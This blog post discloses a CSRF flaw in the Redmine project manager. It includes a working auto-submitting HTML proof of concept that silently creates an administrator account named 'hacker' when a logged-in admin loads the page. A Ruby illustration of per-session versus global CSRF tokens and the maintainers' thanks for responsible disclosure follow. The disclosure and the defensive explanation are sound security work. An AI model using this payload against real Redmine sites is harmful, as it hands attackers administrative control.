Redmine, a flexible project management web application used by many companies, including the one where I work, was until now vulnerable to CSRF across everything from task updates to administration. So the easiest and most critical PoC I could write was one that creates a user with administrative rights.
I contacted Redmine's security team and they rapidly released a new version and a separate patch (they are a cool team, actually). Anyone using Redmine needs to update ASAP, because this vulnerability is a critical one.
<!-- PoC: a cross-site form that submits the "new user" request to the target Redmine instance -->
<form method="POST" action="http://www.site.org/users/new">
  <input type="text" value="hacker" size="25" name="user[login]" id="user_login"/>
  <input type="text" value="hacker" size="30" name="user[firstname]" id="user_firstname"/>
  <input type="text" value="hacker" size="30" name="user[lastname]" id="user_lastname"/>
  <input type="text" value="hacker@hacker.com" size="30" name="user[mail]" id="user_mail"/>
  <input type="password" size="25" name="password" id="password" value="hacker" />
  <input type="password" size="25" name="password_confirmation" id="password_confirmation" value="hacker" />
  <!-- the hidden field sends user[admin]=1 whether or not the checkbox is ticked -->
  <input type="checkbox" value="1" name="user[admin]" id="user_admin"/>
  <input type="hidden" value="1" name="user[admin]"/>
  <input type="submit" value="Create" id="commit" name="commit" />
</form>
<!-- submits the form automatically as soon as the page loads in the victim's browser -->
<script>document.getElementById("commit").click();</script>
Exploit is here
EDIT: It seems that Redmine was not fixed in the new version :) Maybe there was some problem with my local install, but the token was generated only once and shared by all users. I've contacted them again, so it should finally get fixed.
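As an added illustration (not Redmine's or Rails' code) of why the token must be per user, here is a toy Rails-style CSRF check in Ruby next to a broken variant that, like the behaviour described in the EDIT, hands every user the same token; Session, Request and the module names are hypothetical stand-ins.

```ruby
require 'securerandom'

# Toy stand-ins (hypothetical) for the Rails session and request objects.
Session = Struct.new(:id, :data)
Request = Struct.new(:verb, :params, :session)

module CsrfProtection
  # Per-session token: minted on first use and stored only in that user's session.
  def self.token_for(session)
    session.data[:_csrf_token] ||= SecureRandom.urlsafe_base64(32)
  end

  # Constant-time comparison so the token cannot be guessed byte by byte via timing.
  def self.secure_compare(a, b)
    return false unless a.is_a?(String) && b.is_a?(String) && a.bytesize == b.bytesize
    diff = 0
    a.bytes.zip(b.bytes) { |x, y| diff |= x ^ y }
    diff.zero?
  end

  # Safe methods pass; state-changing requests must echo the session's own token.
  def self.verified?(request)
    return true if %w[GET HEAD].include?(request.verb)
    expected = request.session.data[:_csrf_token]
    !expected.nil? && secure_compare(expected, request.params["authenticity_token"].to_s)
  end
end
# Weak variant: one token minted at boot and handed to every user, as described
# in the EDIT above. Any user of the instance can read it from a page source.
module BrokenCsrfProtection
  GLOBAL_TOKEN = SecureRandom.urlsafe_base64(32)
  def self.token_for(_session); GLOBAL_TOKEN; end
  def self.verified?(request)
    return true if %w[GET HEAD].include?(request.verb)
    request.params["authenticity_token"] == GLOBAL_TOKEN
  end
end
# Constructed scenario: the victim is a logged-in admin, the attacker has a session of their own.
def demo
  admin    = Session.new("sess-admin", {})
  attacker = Session.new("sess-attacker", {})
  forged   = { "user[login]" => "hacker", "user[admin]" => "1" }   # same fields as the PoC form
  with_own_token = forged.merge("authenticity_token" => BrokenCsrfProtection.token_for(attacker))
  {
    per_session_blocks_forgery:   !CsrfProtection.verified?(Request.new("POST", forged, admin)),
    per_session_accepts_own_form: CsrfProtection.verified?(Request.new("POST", { "authenticity_token" => CsrfProtection.token_for(admin) }, admin)),
    global_token_accepts_forgery: BrokenCsrfProtection.verified?(Request.new("POST", with_own_token, admin))
  }
end
```

The cross-site form in the PoC can never learn the admin's per-session value, so the first check rejects it; with a single global token, the attacker's own copy is accepted for the admin's session.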
2 comments:
Thanks again for contacting the security team through the proper channels so we could fix this. Let us know if you notice any other bugs, security or application.
@theadmin
you're welcome :)